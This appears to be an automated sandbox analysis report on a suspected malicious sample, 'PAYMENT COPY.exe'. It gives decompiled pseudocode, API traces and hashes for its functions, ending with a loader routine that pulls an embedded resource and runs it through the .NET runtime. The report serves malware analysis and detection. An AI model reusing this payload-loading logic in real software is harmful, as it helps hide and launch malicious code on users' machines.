                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                    • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                    • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                    • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                    0x00405be6
                                                                    0x00405bfd
                                                                    0x00405c05
                                                                    0x00405c05
                                                                    0x00405c0d

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403473,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403473,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405BE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-2382934351
                                                                    • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                    • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                    • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                    • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040396E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040396E() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2bc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x298
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039CB();
				return E00405A15(_t11, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsmD8C8.tmp", 7);
			}






                                                                    0x0040396e
                                                                    0x0040397d
                                                                    0x00403980
                                                                    0x00403982
                                                                    0x00403982
                                                                    0x00403989
                                                                    0x00403991
                                                                    0x00403994
                                                                    0x00403996
                                                                    0x00403996
                                                                    0x00403996
                                                                    0x0040399d
                                                                    0x004039af

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(000002BC,C:\Users\user~1\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                    • CloseHandle.KERNEL32(00000298,C:\Users\user~1\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403973
                                                                    • C:\Users\user~1\AppData\Local\Temp\nsmD8C8.tmp, xrefs: 004039A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsmD8C8.tmp
                                                                    • API String ID: 2962429428-2116400423
                                                                    • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                    • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                                    • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                    • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}





                                                                    0x004052ec
                                                                    0x004052f6
                                                                    0x00405312
                                                                    0x00405334
                                                                    0x00405337
                                                                    0x0040533d
                                                                    0x00405347
                                                                    0x00405348
                                                                    0x0040534a
                                                                    0x00405350
                                                                    0x00405350
                                                                    0x0040535a
                                                                    0x00000000
                                                                    0x00405368
                                                                    0x0040531f
                                                                    0x00405357
                                                                    0x00405357
                                                                    0x00000000
                                                                    0x00405357
                                                                    0x0040532b
                                                                    0x0040532d
                                                                    0x00000000
                                                                    0x0040532d
                                                                    0x004052fc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405303
                                                                    0x00000000

                                                                    APIs
                                                                    • IsWindowVisible.USER32 ref: 00405317
                                                                    • CallWindowProcA.USER32 ref: 00405368
                                                                      • Part of subcall function 0040431D: SendMessageA.USER32 ref: 0040432F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                    • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                    • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                    • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                    0x00406142
                                                                    0x00406144
                                                                    0x0040615c
                                                                    0x00406161
                                                                    0x00406166
                                                                    0x004061a3
                                                                    0x004061a3
                                                                    0x00406168
                                                                    0x0040617a
                                                                    0x00406185
                                                                    0x0040618b
                                                                    0x00406195
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406195
                                                                    0x004061a8

                                                                    APIs
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                                    • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID: Call
                                                                    • API String ID: 3356406503-1824292864
                                                                    • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                    • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                                    • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                    • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                    0x004058f5
                                                                    0x00405915
                                                                    0x0040591d
                                                                    0x00405922
                                                                    0x00000000
                                                                    0x00405928
                                                                    0x0040592c

                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                    • CloseHandle.KERNEL32(?), ref: 00405922
                                                                    Strings
                                                                    • Error launching installer, xrefs: 004058FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                    • Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
                                                                    • Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                    • Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                    0x00405c2d
                                                                    0x00405c37
                                                                    0x00405c39
                                                                    0x00405c40
                                                                    0x00405c48
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405c48
                                                                    0x00405c4a
                                                                    0x00405c4f

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT COPY.exe,C:\Users\user\Desktop\PAYMENT COPY.exe,80000000,00000003), ref: 00405C32
                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT COPY.exe,C:\Users\user\Desktop\PAYMENT COPY.exe,80000000,00000003), ref: 00405C40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharPrevlstrlen
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 2709904686-3976562730
                                                                    • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                    • Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
                                                                    • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                    • Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 735810E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E735810E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7358405c = _a8;
				 *0x73584060 = _a16;
				 *0x73584064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73584038, E73581556, _t52);
				_t43 =  *0x7358405c +  *0x7358405c * 4 << 2;
				_t17 = E7358123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73581266(E735812AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E735812D1( *_t55 - 0x30, E7358123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73584030;
								 *0x73584030 = _t31;
								E73581508(_t31 + 4,  *0x73584064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73584030;
							if( *0x73584030 != 0) {
								E73581508( *0x73584064, _t34 + 4, _t43);
								_t37 =  *0x73584030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73584030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                    0x735810e7
                                                                    0x735810ef
                                                                    0x73581103
                                                                    0x7358110b
                                                                    0x73581116
                                                                    0x73581119
                                                                    0x73581121
                                                                    0x73581124
                                                                    0x73581126
                                                                    0x735811c4
                                                                    0x735811d0
                                                                    0x7358112c
                                                                    0x7358112d
                                                                    0x7358112d
                                                                    0x73581130
                                                                    0x73581131
                                                                    0x73581134
                                                                    0x73581203
                                                                    0x73581206
                                                                    0x7358119e
                                                                    0x735811a4
                                                                    0x735811ac
                                                                    0x735811b1
                                                                    0x735811b4
                                                                    0x00000000
                                                                    0x735811b4
                                                                    0x73581209
                                                                    0x7358120a
                                                                    0x73581186
                                                                    0x7358118c
                                                                    0x73581194
                                                                    0x00000000
                                                                    0x73581194
                                                                    0x73581152
                                                                    0x73581153
                                                                    0x7358115b
                                                                    0x73581168
                                                                    0x73581170
                                                                    0x73581179
                                                                    0x7358117e
                                                                    0x7358117e
                                                                    0x00000000
                                                                    0x73581153
                                                                    0x7358113a
                                                                    0x735811d1
                                                                    0x735811d1
                                                                    0x735811d8
                                                                    0x735811e5
                                                                    0x735811ea
                                                                    0x735811ef
                                                                    0x735811f5
                                                                    0x735811fb
                                                                    0x735811fb
                                                                    0x00000000
                                                                    0x735811d8
                                                                    0x73581140
                                                                    0x73581143
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73581149
                                                                    0x7358114c
                                                                    0x7358119b
                                                                    0x00000000
                                                                    0x7358119b
                                                                    0x7358114f
                                                                    0x73581150
                                                                    0x73581183
                                                                    0x00000000
                                                                    0x73581183
                                                                    0x00000000
                                                                    0x735811ba
                                                                    0x735811ba
                                                                    0x00000000
                                                                    0x735811c3

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242471104.0000000073581000.00000020.00020000.sdmp, Offset: 73580000, based on PE: true
                                                                    • Associated: 00000000.00000002.242447030.0000000073580000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242513496.0000000073583000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242533114.0000000073585000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 1780285237-0
                                                                    • Opcode ID: d84afe0cd9f6d95050f758155f4548321664f2106bfa848d1fba6ed0c705aa17
                                                                    • Instruction ID: 84adb03486d6065b37b330a47cd6dbe796e660dc08de6298c6a7b0149c73d73d
                                                                    • Opcode Fuzzy Hash: d84afe0cd9f6d95050f758155f4548321664f2106bfa848d1fba6ed0c705aa17
                                                                    • Instruction Fuzzy Hash: AE3192B2504294DFE701EF66F944FE67FF8EB45340B281516EC4ACA250EB349A02CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                    0x00405d5b
                                                                    0x00405d5d
                                                                    0x00405d60
                                                                    0x00405d8c
                                                                    0x00405d65
                                                                    0x00405d6e
                                                                    0x00405d73
                                                                    0x00405d7e
                                                                    0x00405d81
                                                                    0x00405d9d
                                                                    0x00405d83
                                                                    0x00405d8a
                                                                    0x00000000
                                                                    0x00405d8a
                                                                    0x00405d96
                                                                    0x00405d9a
                                                                    0x00405d9a
                                                                    0x00405d94
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                    • CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                    • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                    • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                    • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: PAYMENT COPY.exe PID: 6432 Parent PID: 6392 PAYMENT COPY.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                                                                    0x0040149f
                                                                    0x004014a5
                                                                    0x004014a9
                                                                    0x004014ec
                                                                    0x004014ee
                                                                    0x004014ee
                                                                    0x004014b7
                                                                    0x004014bb
                                                                    0x004014c7
                                                                    0x004014cd
                                                                    0x004014d3
                                                                    0x004014d8
                                                                    0x004014e0
                                                                    0x004014e0
                                                                    0x004014d8
                                                                    0x004014e6
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                    • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                    • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                    • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                    • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                      • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                    • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                    • ExitProcess.KERNEL32 ref: 004014EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                    • String ID: v4.0.30319
                                                                    • API String ID: 2372384083-3152434051
